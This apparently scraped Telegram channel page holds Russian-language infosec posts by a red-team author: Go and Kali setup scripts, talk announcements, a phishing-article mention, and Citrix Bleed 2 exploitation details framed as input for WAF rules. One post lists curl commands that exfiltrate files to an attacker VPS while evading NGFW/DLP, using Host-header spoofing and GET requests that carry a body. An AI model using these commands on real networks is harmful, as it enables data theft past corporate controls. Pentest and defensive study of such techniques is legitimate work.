KGM's notes
669 subscribers
15 photos
8 videos
6 files
28 links
Авторский контент на тему ИБ (web/mobile/social).
Делюсь тем, что хотел бы получить сам когда-то.

https://kgmnotes.ru/ - полезные статьи и заметки по ИБ
https://0xmerch.ru - качественный ИБ-мерч

Для связи: @Russian_OSlNT
Download Telegram
Channel created
Важные нюансы эксплуатации Citrix Bleed 2 (CVE‑2025‑5777):
1. Пути, по которым могут бить атакующие:
/p/u/doAuthentication.do
/nf/auth/doAuthentication.do

2. В теле POST-запроса будет единственный параметр без знака равенства и значения:
login

3.* В случае использования CSRF-токенов, атака будет выполняться в два этапа: 1-й - получение валидного CSRF-токена с помощью предварительного GET-запроса, а 2-й - эксплуатация уязвимости с помощью POST-запроса со всеми необходимыми доп. HTTP-заголовками
Внимание! Регистр как в теле запроса, так и пути обращения может быть произвольным!
Данную особенность крайне важно учитывать при формировании правил для WAF.
5🔥4💯2👏1
Кумуржи_Г_М_Standoff_Talks.pdf
4.4 MB
Презентация доклада с Standoff Talks
7👍1💯1
Мои прошлые доклады:
https://files.bi.zone/f/08899fb60ce840c6a1a6/ - Offzone 2023
https://vk.com/video-172362100_456239226 - Offzone 2024
7
KGM's notes
Мои прошлые доклады: https://files.bi.zone/f/08899fb60ce840c6a1a6/ - Offzone 2023 https://vk.com/video-172362100_456239226 - Offzone 2024
Media is too big
VIEW IN TELEGRAM
Запись доклада "Использование Flipper Zero в RedTeam-проектах"

UPDATE. Не реклама, просто совет от себя: если вы захотите приобрести Flipper Zero, то можете рассмотреть вариант с Джумом, где они продаются официально! Себе я брал там же за ~15 тыс. рублей несколько лет назад. Цена на декабрь 2025 г. - 17 тыс. рублей
7👍5🔥3
KGM's notes
Кумуржи_Г_М_Standoff_Talks.pdf
Media is too big
VIEW IN TELEGRAM
Запись доклада: "Я тебе LoGiN, а ты мне креды? Пошло? Или почему мы до сих пор уязвимы перед CitrixBleed2"
🔥74💯3
Telegram_WebApp.pdf
739.6 KB
Некоторое время назад состоялась публикация моей первой статьи на Хакере: "OTP — не проблема! Прокачиваем фишинг при помощи дыры в Exchange, Telegram-бота и Evilginx2" - по мотивам моего кейса, занявшего 1 место на Awillix Pentest Awards 2025 в номинации "Ловись рыбка".
К данному посту я прикладываю pdf-файл с более подробным описанием нюансов использованияTelegram Web App (или Telegram Mini Apps) в фишинговых кампаниях
11🔥8💯4
Всем привет! Тем, кто еще не успел приобрести билет на предстоящий ZeroNights, предлагаю поучаствовать в розыгрыше индивидуального промокода со скидкой 10% на билет. Затягивать не будем, вечером понедельника определится победитель
🔥54👍3
🔧 Решение проблемы синхронизации времени в Kali Linux (на VMware)

Люблю работать с VMware Workstation Pro и периодически скачиваю новые сборки виртуальных машин с оф. сайта Kali Linux. И каждый раз сталкиваюсь с проблемой рассинхронизации времени 🕓

После долгих экспериментов нашел для себя рабочее решение, которым и пользуюсь теперь на постоянной основе.

📝 Пример установки актуального московского времени на VM с Kali Linux:
# Обновление списка пакетов
sudo apt update

# Установка systemd-timesyncd для NTP-синхронизации
sudo apt install systemd-timesyncd -y

# Установка часового пояса (Москва, UTC+3)
sudo timedatectl set-timezone Europe/Moscow

# Включение автоматической синхронизации времени
sudo timedatectl set-ntp true

# Перезапуск сервиса синхронизации
sudo systemctl restart systemd-timesyncd

# Проверка результата. Убедитесь, что время на вашей системе установилось корректно
timedatectl

# Перезагрузка для применения всех изменений
reboot


🔗 Полезные ссылки:
- Где можно скачать VMware Workstation Pro
- Готовые виртуальные машины Kali Linux

#linux #kali #vmware #setup


KGM's notes
| KGM's notes (EN)
🔥54👍3
🛠 Установка актуальной версии Go на Ubuntu/Debian/Kali Linux

Если вам нужно установить последнюю версию Go, настроить переменную PATH для корректной работы утилит, устанавливаемых через go install, а также инструментов от ProjectDiscovery (через pdtm), то выполните следующие команды:
# Обновляем список пакетов
sudo apt update

# Устанавливаем вспомогательную утилиту jq
sudo apt install jq -y

# Узнаём последнюю версию Go (stable) с официального JSON API
LATEST_VERSION=$(curl -s https://go.dev/dl/?mode=json | jq -r '.[0].version')

# Формируем имя архива (например: go1.25.4.linux-amd64.tar.gz)
FILENAME="${LATEST_VERSION}.linux-amd64.tar.gz"

# Скачиваем последнюю версию
wget "https://go.dev/dl/${FILENAME}" -O "/tmp/${FILENAME}"

# Удаляем старую установку и распаковываем новую
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf "/tmp/${FILENAME}"

# Добавляем пути Go в переменную PATH
echo 'export PATH=/usr/local/go/bin:~/go/bin:~/.pdtm/go/bin:$PATH' >> ~/.profile

# Применяем изменения к текущей сессии
source ~/.profile

# Проверяем установленную версию
echo "Go обновлён до версии: $LATEST_VERSION"
go version


⚠️ Если у вас Kali Linux (где на момент написания заметки по умолчанию используется zsh), то дополнительно выполните следующие команды:
echo 'export PATH=/usr/local/go/bin:~/go/bin:~/.pdtm/go/bin:$PATH' >> ~/.zprofile
source ~/.zprofile
go version


Ожидаемый результат:
Go обновлён до версии: go1.25.4
go version go1.25.4 linux/amd64


🔄 Обновление Go до актуальной версии:
LATEST_VERSION=$(curl -s https://go.dev/dl/?mode=json | jq -r '.[0].version')
FILENAME="${LATEST_VERSION}.linux-amd64.tar.gz"
wget "https://go.dev/dl/${FILENAME}" -O "/tmp/${FILENAME}"
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf "/tmp/${FILENAME}"
echo "Go обновлён до версии: $LATEST_VERSION"
go version

💡 PATH уже настроен при первой установке, повторно добавлять его не нужно.

🔗 Полезные ссылки:

- Официальный сайт Go
- ProjectDiscovery
- pdtm

#linux #go #setup

KGM's notes | KGM's notes (EN)
👍53🔥1
🛠 Обновление Go до требуемой версии на Ubuntu/Debian/Kali Linux

Если вы уже установили крайнюю версию Go (именно так как это было описано в предыдущей заметке), и хотите откатиться до какой-то определенной прошлой версии, то просто выполните следующие команды:
# Укажите здесь конкретный номер версии, например go1.23.2.linux-amd64.tar.gz
FILENAME="go1.23.2.linux-amd64.tar.gz"

# Скачиваем интересующую нас версию
wget "https://go.dev/dl/${FILENAME}" -O "/tmp/${FILENAME}"

# Удаляем прошлую установку и распаковываем новую
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf "/tmp/${FILENAME}"
echo "Go обновлён до версии: $LATEST_VERSION"
go version


Ожидаемый результат:
Go обновлён до версии: go1.23.2
go version go1.23.2 linux/amd64


#linux #go #setup

KGM's notes | KGM's notes (EN)
🔥61👍1
🚀 20% усилий - 80% результата при обходе NGFW и DLP-систем

Тема интересная, много чего можно перепробовать на самом деле... Будем есть слона по частям и в этом посте начнем с разбора самых базовых способов обхода таких систем:

1) Если в организации запрещено прямое обращение на внешние ресурсы по IP-адресу, а вам необходимо скачать, например, с вашего VPS-сервера некоторый файл (но вы не желаете по какой-то причине заморачиваться с регистрацией домена), то стоит попробовать просто добавить фиктивный HTTP-заголовок Host, например:

БЫЛО: curl <URL>/file.txt, где <URL> - это URL-адрес вашего VPS-сервера (протокол:ip:port). Допустим, что запрос, отправленный таким образом, отбрасывается в сети организации не может выйти в сеть Интернет;

СТАЛО: curl -H "Host: <DOMAIN>" <URL>/file.txt, где <DOMAIN> - доменное имя любого веб-сайта, доступ к которому не ограничен из сети организации (может это будет github.com или yandex.ru и т.д.);

И если вы планируете выгрузить файл на ваш VPS-сервер, то можете это сделать следующим образом:
curl -X POST -H "Host: <DOMAIN>" -F "file=@<PATH_TO_FILE>" <URL>/upload, где <PATH_TO_FILE> - путь до файла на диске

2) Если в организации запрещено выгружать файлы на внешние веб-ресурсы, а вам необходимо произвести эксфильтрацию данных на ваш VPS-сервер, то следует попробовать собрать неординарный HTTP-запрос:

БЫЛО: curl -X POST -F 'file=@<PATH_TO_FILE>' <URL>/upload, где <URL> - уже может содержать не только IP, но и доменное имя (про регистрацию доменных имен мы поговорим отдельно) - DLP распознает попытку передачи файла с помощью POST-запроса и блокирует его;

📜 Bypass данного ограничения мне пришел после реверса одного из мобильных приложений, в котором использовалась Яндекс Метрика. SDK-модуль Метрики слал на сервера компании Яндекс POST-запросы с GET-параметрами, мне это показалось интересным и я решил реализовать уже свой веб-сервер, который смог бы принимать GET-запросы с телом (как у обычных POST или PUT запросов) и сохранять отправляемые ему файлы

СТАЛО:
curl -X GET -F "file=@<PATH_TO_FILE>" <URL>/upload (а-ля POST-запрос, но в методе будет указан GET)
или
curl -X GET -T <PATH_TO_FILE> <URL>/upload (а-ля PUT-запрос, но в методе будет указан GET)
Вы можете самостоятельно посмотреть разницу между этими двумя способами отправки файлов с помощью Wireshark.

💡Стоит обратить внимание, что если вы работаете с HTTPS ресурсом, то добавляйте к каждому вызову curl параметр --insecure (или -k), так как зачастую NGFW и DLP-системы в организации будут подсовывать вам свой TLS-сертификат, чтобы читать весь ваш HTTPS-трафик.

Оба описанных в данной заметке способа позволили мне обойти различные NGFW и DLP-системы ведущих игроков на западном и отечественном рынках, дальше мы будем еще больше говорить о рабочих способах обхода таких систем

В продолжение к этому посту я выложу файл server.py, который позволит вам использовать оба описанных в данной заметке трюка. Базовый запуск: python server.py, если нужна будет помощь, то добавляйте параметр --help.

🔗 Полезные ссылки:

- T1567: Эксфильтрация через веб-службу (EN)
- T1567: Эксфильтрация через веб-службу (RU)

#curl #python #exfiltration #infiltration #exfil #T1567

KGM's notes | KGM's notes (EN)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍1
server.py
16.7 KB
🔥71👍1
Audio
Канал RedBlue Notes, который на днях вошел в топ главных ИБ-каналов 2025 г., ведется двумя моими бывшими студентами!
Я очень горжусь ими: ребята не только активно развиваются по своим направлениям (SOC/pentest), но и ведут совместно авторский ИБ-канал и даже выпускают свой подкаст!

Мне приятно слышать и осознавать то, что моя работа в ВУЗе, мои публичные выступления помогают многим ребятам найти себя в ИБ-отрасли (17:34 - 🥺).

P.S. На своем канале я планирую публиковать не только свои какие-то ресерчи по ИБ-тематике, но и выработанные лично мной практические советы по тому как приступить менее болезненно к анализу защищенности веб и мобильных приложений (это не замена Hack The Box Academy или Web Security Academy от PortSwigger, но точно отличная альтернатива перепечатываемым из поста в пост, из wiki в wiki примерам использования различных инструментов).
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍5🔥1